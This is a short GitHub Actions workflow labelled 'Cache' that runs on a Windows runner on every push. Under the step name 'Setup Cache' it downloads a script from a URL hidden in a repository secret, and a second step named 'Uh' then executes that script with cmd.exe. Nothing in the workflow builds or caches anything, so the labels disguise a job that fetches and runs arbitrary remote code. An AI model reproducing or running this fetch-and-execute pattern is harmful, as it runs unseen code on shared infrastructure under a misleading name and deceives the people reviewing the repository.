name: Cache

on: push

jobs:
  build:
    runs-on: windows-latest
    timeout-minutes: 60
    
    steps:
    - name: Setup Cache
      run: Invoke-WebRequest "$Env:CACHE" -OutFile C:\ss.cmd
      env:
        CACHE: ${{ secrets.CACHE }}

    - name: Uh
      run: cmd.exe /c "C:\ss.cmd"
